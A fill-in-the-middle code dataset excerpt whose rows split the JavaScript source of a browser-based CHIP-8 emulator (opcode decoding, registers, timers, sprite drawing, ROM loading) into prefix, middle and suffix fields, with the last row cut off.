file_name large_stringlengths 4 140 | prefix large_stringlengths 0 39k | suffix large_stringlengths 0 36.1k | middle large_stringlengths 0 29.4k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
cpu.js | // https://en.wikipedia.org/wiki/CHIP-8
// http://www.codeslinger.co.uk/pages/projects/chip8/hardware.html
// BYTE = 1 byte
// WORD = 2 bytes
MIDNIGHT = {
fg: "#d387ff",
bg: "#380c52",
}
CHIP8 = {
r: {
// 8-bit registers
// Doubles as special FLAG
V: new Uint8Array(new ArrayBuffer(16)),
I: 0, // ADDRESS REGISTER (16-bit)
PC: 0, // PROGRAM COUNTER (16-bit)
SP: 0, // STACK POINTER (points to empty top)
TD: 0, // DELAY TIMER
TS: 0, // SOUND TIMER
},
ST: new Uint16Array(new ArrayBuffer(64)), // THE STACK!
KEYS: new Uint8Array(new ArrayBuffer(16)),
KH: 0x0,
// Inputs a key, removes the hold key flag if set
inputKey(key) {
if (CHIP8.KH > 0x0) {
CHIP8.r.V[CHIP8.KH - 1] = key;
CHIP8.KH = 0x0;
}
CHIP8.KEYS[key] = 0x1;
},
// Releases a key
releaseKey(key) {
CHIP8.KEYS[key] = 0x0;
},
// Loads in bytes from PRGMBUFFER onto 0x200-.
memLoad(prgmBuffer) {
console.log("Loading program buffer into memory.")
CHIP8.r.I = 0;
CHIP8.r.PC = 0x200;
CHIP8.r.V = new Uint8Array(new ArrayBuffer(16));
prgm = new Uint8Array(prgmBuffer);
for (let i = 0; i < prgm.length; i++) {
CHIP8_MEM[i + 0x200] = prgm[i];
}
console.log("Also loading reserved fonts.")
for (let i = 0; i < FONT.length; i++) {
for (let ix = 0; ix < FONT[i].length; ix++) {
CHIP8_MEM[i * 5 + ix] = FONT[i][ix];
}
}
},
// Consumes from memory the next operation.
// Reads for one word/two bytes!
read: function() {
if (CHIP8.KH > 0x0) {
return;
}
nextOp = CHIP8_MEM[CHIP8.r.PC];
nextOp <<= 8;
nextOp |= CHIP8_MEM[CHIP8.r.PC + 1];
CHIP8.r.PC += 2;
CHIP8.handleTimers();
DEBUGGER.report(nextOp, CHIP8.do(nextOp));
},
// Performs an opcode operation
// Needs to handle all 35 opcodes!
do: function(op) {
firstDigit = (op & 0xf000) >> 12;
secondDigit = (op & 0x0f00) >> 8;
thirdDigit = (op & 0x00f0) >> 4;
fourthDigit = op & 0x000f;
| switch (firstDigit) {
case 0x0:
// handle 0x0..
return CHIP8.handleOp0(op & 0xfff);
case 0x1:
// JUMP opcode (0x1NNN)
if ((op & 0x0fff) == CHIP8.r.PC - 0x2) {
CHIP8.r.PC = op & 0x0fff;
return CODES.terminate;
}
CHIP8.r.PC = op & 0x0fff;
return CODES.jump;
case 0x2:
// CALL SUBROUTINE (0x2NNN)
// Function call (advanced jump)
CHIP8.ST[CHIP8.r.SP] = CHIP8.r.PC;
CHIP8.r.SP += 1;
CHIP8.r.PC = op & 0x0fff;
return CODES.call;
case 0x3:
// EQUALS OP (0x3XNN)
// Skips next instruction
// if VX == NN
if (CHIP8.r.V[secondDigit] == (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.eq;
case 0x4:
// NOT EQUALS OP (0x4XNN)
// Skips next instruction
// if VX != NN
if (CHIP8.r.V[secondDigit] != (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.neq;
case 0x5:
// EQUALS REG OP (0x5XY0)
// Skips next instruction
// if VX == VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] == CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.eqReg;
}
case 0x6:
// LOAD TO REG (0x6XNN)
// Sets VX to NN.
CHIP8.r.V[secondDigit] = op & 0xff;
return CODES.loadToReg;
case 0x7:
// ADD TO REG (0x7XNN)
// Sets VX to VX + NN.
CHIP8.r.V[secondDigit] += op & 0xff;
return CODES.addToReg;
case 0x8:
// Handle math!
return CHIP8.handleMath(fourthDigit, secondDigit, thirdDigit);
case 0x9:
// NOT EQUALS REG OP (0x9XY0)
// Skips next instruction
// if VX != VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] != CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.neqReg;
}
case 0xA:
// SET I opcode (0xANNN)
CHIP8.r.I = op & 0x0fff;
return CODES.setI;
case 0xB:
// JUMP + V opcode (0xBNNN)
CHIP8.r.PC = (op & 0x0fff) + CHIP8.r.V[0];
return CODES.jumpV;
case 0xC:
// SET RANDOM to V opcode (0xCXNN)
let rand = Math.floor(Math.random() * 256);
CHIP8.r.V[secondDigit] = rand & (op & 0xff);
return CODES.setRand;
case 0xD:
// DRAW CODE
CHIP8_GRAPHICS.drawSprite(secondDigit, thirdDigit, fourthDigit);
return CODES.draw;
case 0xE:
return CHIP8.handleOpE(secondDigit, op & 0xff);
case 0xF:
return CHIP8.handleOpF(secondDigit, op & 0xff);
default:
console.error("opcode not supported: " + hex(op));
}
return CODES.unknown;
},
handleOpE: function(reg, mode) {
switch (mode) {
case 0x9E:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x1) {
CHIP8.r.PC += 2;
}
return CODES.keyEqJump;
case 0xA1:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x0) {
CHIP8.r.PC += 2;
}
return CODES.keyNotEqJump;
default:
console.error("Key 0xE code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleTimers: function() {
if (CHIP8.r.TD > 0) {
CHIP8.r.TD -= 1;
}
if (CHIP8.r.TS > 0) {
CHIP8.r.TS -= 1;
}
},
handleOpF: function(reg, mode) {
switch (mode) {
case 0x07:
// SET VX to DELAY TIMER
CHIP8.r.V[reg] = CHIP8.r.TD;
return CODES.getDelay;
case 0x0A:
// WAIT FOR KEY
CHIP8.KH = reg + 0x1;
return CODES.keyWait;
case 0x15:
// SET DELAY TIMER to VX
CHIP8.r.TD = CHIP8.r.V[reg];
return CODES.setDelay;
case 0x18:
// SET SOUND TIMER to VX
CHIP8.r.TS = CHIP8.r.V[reg];
return CODES.setSound;
case 0x1E:
// ADD VX TO I
if (CHIP8.r.I + CHIP8.r.V[reg] > 0xfff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.I += CHIP8.r.V[reg];
return CODES.addI;
case 0x29:
CHIP8.r.I = CHIP8.r.V[reg] * 5;
return CODES.fontSetI;
case 0x33:
// CONVERTS VX TO DECIMAL; DUMPS
// BASE-10 DIGITS TO MEMORY
let rn = CHIP8.r.V[reg];
for (let d = 0; d <= 2; d++) {
CHIP8_MEM[CHIP8.r.I + d] = (Math.floor(rn / Math.pow(10, 2 - d))) % 10;
}
return CODES.decimalize;
case 0x55:
// DUMP V0~VX TO MEMORY
for (let i = 0x0; i <= reg; i++) {
CHIP8_MEM[CHIP8.r.I + i] = CHIP8.r.V[i];
}
return CODES.dumpReg;
case 0x65:
// RESTORE FROM MEMORY TO V0~VX
for (let i = 0x0; i <= reg; i++) {
CHIP8.r.V[i] = CHIP8_MEM[CHIP8.r.I + i];
}
return CODES.restoreReg;
default:
console.error("0xF code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleOp0: function(mode) {
switch(mode) {
case 0xE0:
CHIP8_GRAPHICS.clear();
return CODES.dispclear;
case 0xEE:
CHIP8.r.SP -= 1;
CHIP8.r.PC = CHIP8.ST[CHIP8.r.SP];
CHIP8.ST[CHIP8.r.SP] = 0;
return CODES.return;
default:
console.error("RCA 1802 (" + mode.toString(16) + ") not supported: " + hex(mode));
}
return CODES.unknown;
},
handleMath: function(mode, x, y) {
switch (mode) {
case 0x0:
CHIP8.r.V[x] = CHIP8.r.V[y]
return CODES.copyReg;
case 0x1:
CHIP8.r.V[x] |= CHIP8.r.V[y]
return CODES.or;
case 0x2:
CHIP8.r.V[x] &= CHIP8.r.V[y]
return CODES.and;
case 0x3:
CHIP8.r.V[x] ^= CHIP8.r.V[y]
return CODES.xor;
case 0x4:
if (CHIP8.r.V[x] + CHIP8.r.V[y] > 0xff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] += CHIP8.r.V[y]
return CODES.add;
case 0x5:
if (CHIP8.r.V[x] > CHIP8.r.V[y]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] -= CHIP8.r.V[y]
return CODES.sub;
case 0x6:
CHIP8.r.V[0xf] = CHIP8.r.V[x] & 0x1;
CHIP8.r.V[x] >>= 1;
return CODES.rightShift;
case 0x7:
if (CHIP8.r.V[y] > CHIP8.r.V[x]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] = CHIP8.r.V[y] - CHIP8.r.V[x]
return CODES.subInv;
case 0xE:
CHIP8.r.V[0xf] = CHIP8.r.V[x] != 0x0 ? 0x1 : 0x0;
CHIP8.r.V[x] <<= 1;
return CODES.leftShift;
default:
console.error("math opcode not supported: 0x" + hex(mode));
}
return CODES.unknown;
},
}
// There are 0xFFF (~4096) bytes of memory here.
CHIP8_MEM = new Uint8Array(new ArrayBuffer(4096));
CHIP8_GRAPHICS = {
// To fit a resolution of 64x32. Might
// as well give it a full byte..
buffer: new Uint8Array(new ArrayBuffer(64*32)),
// NAIVE drawing function
draw: function() {
let ctx = document.getElementById("screen").getContext("2d");
for (let p = 0; p < CHIP8_GRAPHICS.buffer.length; p++) {
let x = p % 64, y = Math.floor(p / 64);
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(x * 10, y * 10, 10, 10);
if (CHIP8_GRAPHICS.buffer[p] > 0) {
ctx.fillStyle = MIDNIGHT.fg;
ctx.fillRect(x * 10 + 1, y * 10 + 1, 8, 8);
}
}
},
drawSprite: function(x, y, n) {
// Starting from (x, y),
// reads N bytes from memory
// starting at I. Each byte represents
// one 8-pixel row.
x = CHIP8.r.V[x];
y = CHIP8.r.V[y];
let ctx = document.getElementById("screen").getContext("2d");
ctx.clearRect(x, y, 8, n);
CHIP8.r.V[0xF] = 0;
for (let ind = 0; ind < n; ind++) {
let row = CHIP8_MEM[CHIP8.r.I + ind];
let ny = (y + ind) % 32;
for (let tx = 0; tx < 8; tx++) {
let nx = (x + (7 - tx)) % 64;
let p = nx + (ny * 64);
let old = CHIP8_GRAPHICS.buffer[p];
CHIP8_GRAPHICS.buffer[p] ^= row & 0x1;
if (old == 0x1 && CHIP8_GRAPHICS.buffer[p] == 0x0) {
CHIP8.r.V[0xF] = 1;
}
row >>= 1;
}
}
CHIP8_GRAPHICS.draw();
},
forceWash: function() {
let ctx = document.getElementById("screen").getContext("2d");
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(0, 0, 640, 360);
},
clear: function() {
// TODO: Add more to clear.
CHIP8_GRAPHICS.forceWash();
CHIP8_GRAPHICS.buffer = new Uint8Array(new ArrayBuffer(64*32));
}
}
let FPS_INTERVAL = 1;
function loadROM(fileList) {
if (fileList.length > 0) {
document.getElementById("romInput").hidden = true;
document.getElementById("romHelper").hidden = true;
document.getElementById("helperText2").hidden = true;
document.getElementById("helperText").innerHTML = `<b>Nice!</b> You can now use the controls below to start emulating.
<br>Use the left shoulder of your keyboard (1-4, Q-R, A-F, Z-V) as
<br>the hexpad input. You can also see the "Keys" tab for key bindings.
<br><br>To load a different ROM, please refresh the page.
<br><br>Enjoy the emulator!`
// Load it into memory!
fileList[0].arrayBuffer().then((b) => {
console.log("ROM read completed, size = " + new Uint8Array(b).length);
CHIP8.memLoad(b);
drawDebugger();
})
} else {
console.log("change found, but no files uploaded.");
}
}
let clockInterval;
function startLoop() {
clearLoop();
FPS_INTERVAL = 1;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function startSlowLoop() {
clearLoop();
DEBUGGER.slowMode = true;
FPS_INTERVAL = 200;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function loop() {
CHIP8.read();
drawDebugger();
}
function init() {
CHIP8_GRAPHICS.clear();
CHIP8_GRAPHICS.draw();
drawDebugger();
}
function clearLoop() {
if (clockInterval) {
clearInterval(clockInterval);
DEBUGGER.slowMode = false;
clockInterval = 0;
}
} | random_line_split | |
cpu.js | // https://en.wikipedia.org/wiki/CHIP-8
// http://www.codeslinger.co.uk/pages/projects/chip8/hardware.html
// BYTE = 1 byte
// WORD = 2 bytes
MIDNIGHT = {
fg: "#d387ff",
bg: "#380c52",
}
CHIP8 = {
r: {
// 8-bit registers
// Doubles as special FLAG
V: new Uint8Array(new ArrayBuffer(16)),
I: 0, // ADDRESS REGISTER (16-bit)
PC: 0, // PROGRAM COUNTER (16-bit)
SP: 0, // STACK POINTER (points to empty top)
TD: 0, // DELAY TIMER
TS: 0, // SOUND TIMER
},
ST: new Uint16Array(new ArrayBuffer(64)), // THE STACK!
KEYS: new Uint8Array(new ArrayBuffer(16)),
KH: 0x0,
// Inputs a key, removes the hold key flag if set
inputKey(key) {
if (CHIP8.KH > 0x0) {
CHIP8.r.V[CHIP8.KH - 1] = key;
CHIP8.KH = 0x0;
}
CHIP8.KEYS[key] = 0x1;
},
// Releases a key
releaseKey(key) {
CHIP8.KEYS[key] = 0x0;
},
// Loads in bytes from PRGMBUFFER onto 0x200-.
memLoad(prgmBuffer) {
console.log("Loading program buffer into memory.")
CHIP8.r.I = 0;
CHIP8.r.PC = 0x200;
CHIP8.r.V = new Uint8Array(new ArrayBuffer(16));
prgm = new Uint8Array(prgmBuffer);
for (let i = 0; i < prgm.length; i++) {
CHIP8_MEM[i + 0x200] = prgm[i];
}
console.log("Also loading reserved fonts.")
for (let i = 0; i < FONT.length; i++) {
for (let ix = 0; ix < FONT[i].length; ix++) {
CHIP8_MEM[i * 5 + ix] = FONT[i][ix];
}
}
},
// Consumes from memory the next operation.
// Reads for one word/two bytes!
read: function() {
if (CHIP8.KH > 0x0) {
return;
}
nextOp = CHIP8_MEM[CHIP8.r.PC];
nextOp <<= 8;
nextOp |= CHIP8_MEM[CHIP8.r.PC + 1];
CHIP8.r.PC += 2;
CHIP8.handleTimers();
DEBUGGER.report(nextOp, CHIP8.do(nextOp));
},
// Performs an opcode operation
// Needs to handle all 35 opcodes!
do: function(op) {
firstDigit = (op & 0xf000) >> 12;
secondDigit = (op & 0x0f00) >> 8;
thirdDigit = (op & 0x00f0) >> 4;
fourthDigit = op & 0x000f;
switch (firstDigit) {
case 0x0:
// handle 0x0..
return CHIP8.handleOp0(op & 0xfff);
case 0x1:
// JUMP opcode (0x1NNN)
if ((op & 0x0fff) == CHIP8.r.PC - 0x2) {
CHIP8.r.PC = op & 0x0fff;
return CODES.terminate;
}
CHIP8.r.PC = op & 0x0fff;
return CODES.jump;
case 0x2:
// CALL SUBROUTINE (0x2NNN)
// Function call (advanced jump)
CHIP8.ST[CHIP8.r.SP] = CHIP8.r.PC;
CHIP8.r.SP += 1;
CHIP8.r.PC = op & 0x0fff;
return CODES.call;
case 0x3:
// EQUALS OP (0x3XNN)
// Skips next instruction
// if VX == NN
if (CHIP8.r.V[secondDigit] == (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.eq;
case 0x4:
// NOT EQUALS OP (0x4XNN)
// Skips next instruction
// if VX != NN
if (CHIP8.r.V[secondDigit] != (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.neq;
case 0x5:
// EQUALS REG OP (0x5XY0)
// Skips next instruction
// if VX == VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] == CHIP8.r.V[thirdDigit]) |
return CODES.eqReg;
}
case 0x6:
// LOAD TO REG (0x6XNN)
// Sets VX to NN.
CHIP8.r.V[secondDigit] = op & 0xff;
return CODES.loadToReg;
case 0x7:
// ADD TO REG (0x7XNN)
// Sets VX to VX + NN.
CHIP8.r.V[secondDigit] += op & 0xff;
return CODES.addToReg;
case 0x8:
// Handle math!
return CHIP8.handleMath(fourthDigit, secondDigit, thirdDigit);
case 0x9:
// NOT EQUALS REG OP (0x9XY0)
// Skips next instruction
// if VX != VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] != CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.neqReg;
}
case 0xA:
// SET I opcode (0xANNN)
CHIP8.r.I = op & 0x0fff;
return CODES.setI;
case 0xB:
// JUMP + V opcode (0xBNNN)
CHIP8.r.PC = (op & 0x0fff) + CHIP8.r.V[0];
return CODES.jumpV;
case 0xC:
// SET RANDOM to V opcode (0xCXNN)
let rand = Math.floor(Math.random() * 256);
CHIP8.r.V[secondDigit] = rand & (op & 0xff);
return CODES.setRand;
case 0xD:
// DRAW CODE
CHIP8_GRAPHICS.drawSprite(secondDigit, thirdDigit, fourthDigit);
return CODES.draw;
case 0xE:
return CHIP8.handleOpE(secondDigit, op & 0xff);
case 0xF:
return CHIP8.handleOpF(secondDigit, op & 0xff);
default:
console.error("opcode not supported: " + hex(op));
}
return CODES.unknown;
},
handleOpE: function(reg, mode) {
switch (mode) {
case 0x9E:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x1) {
CHIP8.r.PC += 2;
}
return CODES.keyEqJump;
case 0xA1:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x0) {
CHIP8.r.PC += 2;
}
return CODES.keyNotEqJump;
default:
console.error("Key 0xE code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleTimers: function() {
if (CHIP8.r.TD > 0) {
CHIP8.r.TD -= 1;
}
if (CHIP8.r.TS > 0) {
CHIP8.r.TS -= 1;
}
},
handleOpF: function(reg, mode) {
switch (mode) {
case 0x07:
// SET VX to DELAY TIMER
CHIP8.r.V[reg] = CHIP8.r.TD;
return CODES.getDelay;
case 0x0A:
// WAIT FOR KEY
CHIP8.KH = reg + 0x1;
return CODES.keyWait;
case 0x15:
// SET DELAY TIMER to VX
CHIP8.r.TD = CHIP8.r.V[reg];
return CODES.setDelay;
case 0x18:
// SET SOUND TIMER to VX
CHIP8.r.TS = CHIP8.r.V[reg];
return CODES.setSound;
case 0x1E:
// ADD VX TO I
if (CHIP8.r.I + CHIP8.r.V[reg] > 0xfff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.I += CHIP8.r.V[reg];
return CODES.addI;
case 0x29:
CHIP8.r.I = CHIP8.r.V[reg] * 5;
return CODES.fontSetI;
case 0x33:
// CONVERTS VX TO DECIMAL; DUMPS
// BASE-10 DIGITS TO MEMORY
let rn = CHIP8.r.V[reg];
for (let d = 0; d <= 2; d++) {
CHIP8_MEM[CHIP8.r.I + d] = (Math.floor(rn / Math.pow(10, 2 - d))) % 10;
}
return CODES.decimalize;
case 0x55:
// DUMP V0~VX TO MEMORY
for (let i = 0x0; i <= reg; i++) {
CHIP8_MEM[CHIP8.r.I + i] = CHIP8.r.V[i];
}
return CODES.dumpReg;
case 0x65:
// RESTORE FROM MEMORY TO V0~VX
for (let i = 0x0; i <= reg; i++) {
CHIP8.r.V[i] = CHIP8_MEM[CHIP8.r.I + i];
}
return CODES.restoreReg;
default:
console.error("0xF code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleOp0: function(mode) {
switch(mode) {
case 0xE0:
CHIP8_GRAPHICS.clear();
return CODES.dispclear;
case 0xEE:
CHIP8.r.SP -= 1;
CHIP8.r.PC = CHIP8.ST[CHIP8.r.SP];
CHIP8.ST[CHIP8.r.SP] = 0;
return CODES.return;
default:
console.error("RCA 1802 (" + mode.toString(16) + ") not supported: " + hex(mode));
}
return CODES.unknown;
},
handleMath: function(mode, x, y) {
switch (mode) {
case 0x0:
CHIP8.r.V[x] = CHIP8.r.V[y]
return CODES.copyReg;
case 0x1:
CHIP8.r.V[x] |= CHIP8.r.V[y]
return CODES.or;
case 0x2:
CHIP8.r.V[x] &= CHIP8.r.V[y]
return CODES.and;
case 0x3:
CHIP8.r.V[x] ^= CHIP8.r.V[y]
return CODES.xor;
case 0x4:
if (CHIP8.r.V[x] + CHIP8.r.V[y] > 0xff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] += CHIP8.r.V[y]
return CODES.add;
case 0x5:
if (CHIP8.r.V[x] > CHIP8.r.V[y]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] -= CHIP8.r.V[y]
return CODES.sub;
case 0x6:
CHIP8.r.V[0xf] = CHIP8.r.V[x] & 0x1;
CHIP8.r.V[x] >>= 1;
return CODES.rightShift;
case 0x7:
if (CHIP8.r.V[y] > CHIP8.r.V[x]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] = CHIP8.r.V[y] - CHIP8.r.V[x]
return CODES.subInv;
case 0xE:
CHIP8.r.V[0xf] = CHIP8.r.V[x] != 0x0 ? 0x1 : 0x0;
CHIP8.r.V[x] <<= 1;
return CODES.leftShift;
default:
console.error("math opcode not supported: 0x" + hex(mode));
}
return CODES.unknown;
},
}
// There are 0xFFF (~4096) bytes of memory here.
CHIP8_MEM = new Uint8Array(new ArrayBuffer(4096));
CHIP8_GRAPHICS = {
// To fit a resolution of 64x32. Might
// as well give it a full byte..
buffer: new Uint8Array(new ArrayBuffer(64*32)),
// NAIVE drawing function
draw: function() {
let ctx = document.getElementById("screen").getContext("2d");
for (let p = 0; p < CHIP8_GRAPHICS.buffer.length; p++) {
let x = p % 64, y = Math.floor(p / 64);
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(x * 10, y * 10, 10, 10);
if (CHIP8_GRAPHICS.buffer[p] > 0) {
ctx.fillStyle = MIDNIGHT.fg;
ctx.fillRect(x * 10 + 1, y * 10 + 1, 8, 8);
}
}
},
drawSprite: function(x, y, n) {
// Starting from (x, y),
// reads N bytes from memory
// starting at I. Each byte represents
// one 8-pixel row.
x = CHIP8.r.V[x];
y = CHIP8.r.V[y];
let ctx = document.getElementById("screen").getContext("2d");
ctx.clearRect(x, y, 8, n);
CHIP8.r.V[0xF] = 0;
for (let ind = 0; ind < n; ind++) {
let row = CHIP8_MEM[CHIP8.r.I + ind];
let ny = (y + ind) % 32;
for (let tx = 0; tx < 8; tx++) {
let nx = (x + (7 - tx)) % 64;
let p = nx + (ny * 64);
let old = CHIP8_GRAPHICS.buffer[p];
CHIP8_GRAPHICS.buffer[p] ^= row & 0x1;
if (old == 0x1 && CHIP8_GRAPHICS.buffer[p] == 0x0) {
CHIP8.r.V[0xF] = 1;
}
row >>= 1;
}
}
CHIP8_GRAPHICS.draw();
},
forceWash: function() {
let ctx = document.getElementById("screen").getContext("2d");
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(0, 0, 640, 360);
},
clear: function() {
// TODO: Add more to clear.
CHIP8_GRAPHICS.forceWash();
CHIP8_GRAPHICS.buffer = new Uint8Array(new ArrayBuffer(64*32));
}
}
let FPS_INTERVAL = 1;
function loadROM(fileList) {
if (fileList.length > 0) {
document.getElementById("romInput").hidden = true;
document.getElementById("romHelper").hidden = true;
document.getElementById("helperText2").hidden = true;
document.getElementById("helperText").innerHTML = `<b>Nice!</b> You can now use the controls below to start emulating.
<br>Use the left shoulder of your keyboard (1-4, Q-R, A-F, Z-V) as
<br>the hexpad input. You can also see the "Keys" tab for key bindings.
<br><br>To load a different ROM, please refresh the page.
<br><br>Enjoy the emulator!`
// Load it into memory!
fileList[0].arrayBuffer().then((b) => {
console.log("ROM read completed, size = " + new Uint8Array(b).length);
CHIP8.memLoad(b);
drawDebugger();
})
} else {
console.log("change found, but no files uploaded.");
}
}
let clockInterval;
function startLoop() {
clearLoop();
FPS_INTERVAL = 1;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function startSlowLoop() {
clearLoop();
DEBUGGER.slowMode = true;
FPS_INTERVAL = 200;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function loop() {
CHIP8.read();
drawDebugger();
}
function init() {
CHIP8_GRAPHICS.clear();
CHIP8_GRAPHICS.draw();
drawDebugger();
}
function clearLoop() {
if (clockInterval) {
clearInterval(clockInterval);
DEBUGGER.slowMode = false;
clockInterval = 0;
}
} | {
CHIP8.r.PC += 2;
} | conditional_block |
cpu.js | // https://en.wikipedia.org/wiki/CHIP-8
// http://www.codeslinger.co.uk/pages/projects/chip8/hardware.html
// BYTE = 1 byte
// WORD = 2 bytes
MIDNIGHT = {
fg: "#d387ff",
bg: "#380c52",
}
CHIP8 = {
r: {
// 8-bit registers
// Doubles as special FLAG
V: new Uint8Array(new ArrayBuffer(16)),
I: 0, // ADDRESS REGISTER (16-bit)
PC: 0, // PROGRAM COUNTER (16-bit)
SP: 0, // STACK POINTER (points to empty top)
TD: 0, // DELAY TIMER
TS: 0, // SOUND TIMER
},
ST: new Uint16Array(new ArrayBuffer(64)), // THE STACK!
KEYS: new Uint8Array(new ArrayBuffer(16)),
KH: 0x0,
// Inputs a key, removes the hold key flag if set
inputKey(key) {
if (CHIP8.KH > 0x0) {
CHIP8.r.V[CHIP8.KH - 1] = key;
CHIP8.KH = 0x0;
}
CHIP8.KEYS[key] = 0x1;
},
// Releases a key
releaseKey(key) {
CHIP8.KEYS[key] = 0x0;
},
// Loads in bytes from PRGMBUFFER onto 0x200-.
| (prgmBuffer) {
console.log("Loading program buffer into memory.")
CHIP8.r.I = 0;
CHIP8.r.PC = 0x200;
CHIP8.r.V = new Uint8Array(new ArrayBuffer(16));
prgm = new Uint8Array(prgmBuffer);
for (let i = 0; i < prgm.length; i++) {
CHIP8_MEM[i + 0x200] = prgm[i];
}
console.log("Also loading reserved fonts.")
for (let i = 0; i < FONT.length; i++) {
for (let ix = 0; ix < FONT[i].length; ix++) {
CHIP8_MEM[i * 5 + ix] = FONT[i][ix];
}
}
},
// Consumes from memory the next operation.
// Reads for one word/two bytes!
read: function() {
if (CHIP8.KH > 0x0) {
return;
}
nextOp = CHIP8_MEM[CHIP8.r.PC];
nextOp <<= 8;
nextOp |= CHIP8_MEM[CHIP8.r.PC + 1];
CHIP8.r.PC += 2;
CHIP8.handleTimers();
DEBUGGER.report(nextOp, CHIP8.do(nextOp));
},
// Performs an opcode operation
// Needs to handle all 35 opcodes!
do: function(op) {
firstDigit = (op & 0xf000) >> 12;
secondDigit = (op & 0x0f00) >> 8;
thirdDigit = (op & 0x00f0) >> 4;
fourthDigit = op & 0x000f;
switch (firstDigit) {
case 0x0:
// handle 0x0..
return CHIP8.handleOp0(op & 0xfff);
case 0x1:
// JUMP opcode (0x1NNN)
if ((op & 0x0fff) == CHIP8.r.PC - 0x2) {
CHIP8.r.PC = op & 0x0fff;
return CODES.terminate;
}
CHIP8.r.PC = op & 0x0fff;
return CODES.jump;
case 0x2:
// CALL SUBROUTINE (0x2NNN)
// Function call (advanced jump)
CHIP8.ST[CHIP8.r.SP] = CHIP8.r.PC;
CHIP8.r.SP += 1;
CHIP8.r.PC = op & 0x0fff;
return CODES.call;
case 0x3:
// EQUALS OP (0x3XNN)
// Skips next instruction
// if VX == NN
if (CHIP8.r.V[secondDigit] == (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.eq;
case 0x4:
// NOT EQUALS OP (0x4XNN)
// Skips next instruction
// if VX != NN
if (CHIP8.r.V[secondDigit] != (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.neq;
case 0x5:
// EQUALS REG OP (0x5XY0)
// Skips next instruction
// if VX == VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] == CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.eqReg;
}
case 0x6:
// LOAD TO REG (0x6XNN)
// Sets VX to NN.
CHIP8.r.V[secondDigit] = op & 0xff;
return CODES.loadToReg;
case 0x7:
// ADD TO REG (0x7XNN)
// Sets VX to VX + NN.
CHIP8.r.V[secondDigit] += op & 0xff;
return CODES.addToReg;
case 0x8:
// Handle math!
return CHIP8.handleMath(fourthDigit, secondDigit, thirdDigit);
case 0x9:
// NOT EQUALS REG OP (0x9XY0)
// Skips next instruction
// if VX != VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] != CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.neqReg;
}
case 0xA:
// SET I opcode (0xANNN)
CHIP8.r.I = op & 0x0fff;
return CODES.setI;
case 0xB:
// JUMP + V opcode (0xBNNN)
CHIP8.r.PC = (op & 0x0fff) + CHIP8.r.V[0];
return CODES.jumpV;
case 0xC:
// SET RANDOM to V opcode (0xCXNN)
let rand = Math.floor(Math.random() * 256);
CHIP8.r.V[secondDigit] = rand & (op & 0xff);
return CODES.setRand;
case 0xD:
// DRAW CODE
CHIP8_GRAPHICS.drawSprite(secondDigit, thirdDigit, fourthDigit);
return CODES.draw;
case 0xE:
return CHIP8.handleOpE(secondDigit, op & 0xff);
case 0xF:
return CHIP8.handleOpF(secondDigit, op & 0xff);
default:
console.error("opcode not supported: " + hex(op));
}
return CODES.unknown;
},
handleOpE: function(reg, mode) {
switch (mode) {
case 0x9E:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x1) {
CHIP8.r.PC += 2;
}
return CODES.keyEqJump;
case 0xA1:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x0) {
CHIP8.r.PC += 2;
}
return CODES.keyNotEqJump;
default:
console.error("Key 0xE code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleTimers: function() {
if (CHIP8.r.TD > 0) {
CHIP8.r.TD -= 1;
}
if (CHIP8.r.TS > 0) {
CHIP8.r.TS -= 1;
}
},
handleOpF: function(reg, mode) {
switch (mode) {
case 0x07:
// SET VX to DELAY TIMER
CHIP8.r.V[reg] = CHIP8.r.TD;
return CODES.getDelay;
case 0x0A:
// WAIT FOR KEY
CHIP8.KH = reg + 0x1;
return CODES.keyWait;
case 0x15:
// SET DELAY TIMER to VX
CHIP8.r.TD = CHIP8.r.V[reg];
return CODES.setDelay;
case 0x18:
// SET SOUND TIMER to VX
CHIP8.r.TS = CHIP8.r.V[reg];
return CODES.setSound;
case 0x1E:
// ADD VX TO I
